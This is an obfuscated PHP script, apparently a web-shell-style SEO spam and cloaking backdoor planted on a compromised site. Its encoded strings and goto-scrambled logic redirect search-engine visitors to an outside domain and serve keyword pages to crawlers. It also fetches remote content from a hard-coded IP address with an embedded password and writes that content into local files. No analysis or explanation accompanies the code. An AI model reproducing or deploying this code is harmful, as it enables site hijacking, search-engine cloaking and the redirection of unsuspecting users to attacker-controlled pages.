Your IP : 216.73.216.95
<?php
goto HB6dm; qLttv: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto R8EHV; Wj8Rt: $apass1 = "\166\x69\163\144\x6f\151\152\x65\x77"; goto oTvdx; NApxd: if (strlen($text) < 5000) { $url = "\61\x33\65\56\61\70\61\56\62\x31\x2e\61\x32\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\50{$errno}\51\x3c\x62\x72\x20\x2f\76\xa"; } else { $req = "\x2f" . $_GET["\146\x6e"] . "\56\160\x68\x70\x3f\x70\x61\x73\163\75{$apass}\x26\161\75{$_GET["\151\x64"]}"; $out = "\x47\105\x54\40{$req}\40\110\124\x54\120\x2f\61\56\60\15\12"; $out .= "\110\x6f\x73\x74\x3a\40{$url}\15\xa"; $out .= "\103\x6f\156\x6e\145\x63\164\x69\x6f\156\72\x20\103\x6c\x6f\163\145\15\12\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto uxPRb; uxPRb: if (strlen($text) > 5000) { $out = fopen("\151\x6e\144\145\170\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto LiVSK; Wezpn: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto wQgT7; R8EHV: if (strpos($_SERVER["\x48\x54\124\x50\x5f\122\105\106\x45\x52\105\x52"], "\x67\157\x6f\147\154\145\x2e") or strpos($_SERVER["\110\x54\x54\120\x5f\122\x45\x46\x45\122\x45\122"], "\171\141\x68\157\157\56") or strpos($_SERVER["\x48\x54\x54\120\137\x52\x45\106\105\x52\x45\x52"], "\142\151\156\147\56")) { $tpl = "\x69\x6e\144\x65\170\57" . $_GET["\x69\x64"] . "\56\160\150\160\x2e\x74\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\x79"]; header("\x4c\157\143\141\x74\151\x6f\x6e\x3a\x20\x68\164\164\160\x73\72\x2f\x2f\x63\150\160\157\153\56\x73\151\x74\x65\57\145\156\x74\x65\162\57\77\155\141\162\x6b\x3d{$today}\x2d{$s}\46\164\160\x6c\75{$tpl}\x26\145\x6e\x67\x6b\x65\x79\75{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\56\160\x68\x70"; if (file_exists("\x69\156\x64\x65\x78\x2f" . $myname)) { $html = @file_get_contents("\151\156\x64\145\x78\57" . $myname); if (strpos($_SERVER["\110\x54\x54\x50\137\125\x53\105\x52\x5f\x41\107\x45\x4e\124"], "\142\x69\156\x67") > 2 or strpos($_SERVER["\110\124\124\x50\x5f\125\x53\105\x52\137\101\x47\105\116\x54"], "\171\141\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\151\144"]); $html = str_replace("\x3c\164\x69\164\x6c\x65\x3e\74\x2f\x74\x69\164\x6c\x65\x3e", "\x3c\164\151\164\154\x65\76{$keyword}\74\57\164\x69\164\154\145\x3e", $html); } echo $html; die; } } goto PnIcV; SlLgj: $apass2 = "\x62\62\x33\150\x72\x32\x33\x76\162\x33\62"; goto jbxA3; HfHG2: $_GET["\146\x6e"] = "\x36\71\x36\71\x36\x39\156\x65\x77"; goto Wj8Rt; P30Mj: $xx1 = 5; goto lEdHv; fM3YE: if (strlen($text) < 5000) { $text = file_get_contents("\x68\164\x74\x70\72\57\x2f\x31\x33\65\56\x31\70\61\x2e\x32\x31\x2e\x31\x32\66\x2f" . $_GET["\146\156"] . "\x2e\160\x68\160\x3f\x70\141\x73\163\75{$apass}\46\161\x3d{$_GET["\x69\144"]}"); } goto NApxd; eXKOl: $keyword = str_replace("\x20", "\53", $keyword); goto SlLgj; lEdHv: $keyword = str_replace("\x2d", "\x20", $_GET["\x69\x64"]); goto eXKOl; sGaMj: if (function_exists("\x63\165\162\154\137\x69\x6e\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\164\x70\72\57\57\x31\63\65\x2e\x31\x38\x31\x2e\x32\61\x2e\x31\62\x36\x2f" . $_GET["\146\156"] . "\x2e\x70\x68\160\77\x70\x61\x73\x73\x3d{$apass}\x26\x71\75{$_GET["\151\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\151\154\x6c\x61\57\x34\56\60\x20\x28\143\x6f\155\x70\x61\164\x69\x62\154\145\73\40\x4d\x53\111\x45\x20\x36\56\60\x3b\40\127\x69\156\x64\157\x77\x73\40\116\x54\40\65\x2e\61\73\x20\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto fM3YE; hhAV2: $today = "\62\60\62\65\x30\66\x31\x38\x2d"; goto vse_4; oTvdx: $x1 = 3; goto P30Mj; jbxA3: $s = dirname($_SERVER["\120\110\120\x5f\123\105\114\x46"]); goto Wezpn; HB6dm: error_reporting(0); goto hhAV2; wQgT7: $s = $_SERVER["\x53\105\x52\126\105\x52\137\x4e\101\115\x45"] . $s; goto q5Kd2; LiVSK: echo $text; goto jB0yL; ILXD7: if ($_GET["\x69\144"] == "\x69\156\144\145\170") { header("\x4c\x6f\x63\141\164\151\157\156\x3a\40\150\x74\x74\160\163\72\x2f\57\x67\157\x6f\147\x6c\145\x2e\143\x6f\155"); die; } goto wRRod; wRRod: $_GET["\167\x6f\162\x6c\144"] = 5; goto HfHG2; q5Kd2: $apass3 = "\x72\x76\x33\62\x79\144\141\143\163\166\163\x64\166"; goto qLttv; PnIcV: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\x69\144"]); goto d9kYv; aL6kQ: if ($_GET["\151\x64"] == "\x74\x65\163\x74\151\x6e\147") { echo "\164\x65\163\164\40\x67\157\157\144\56\56\x2e"; die; } goto ILXD7; d9kYv: $text = ''; goto sGaMj; vse_4: foreach ($_GET as $a => $b) { $_GET["\151\144"] = $b; } goto aL6kQ; jB0yL: ?>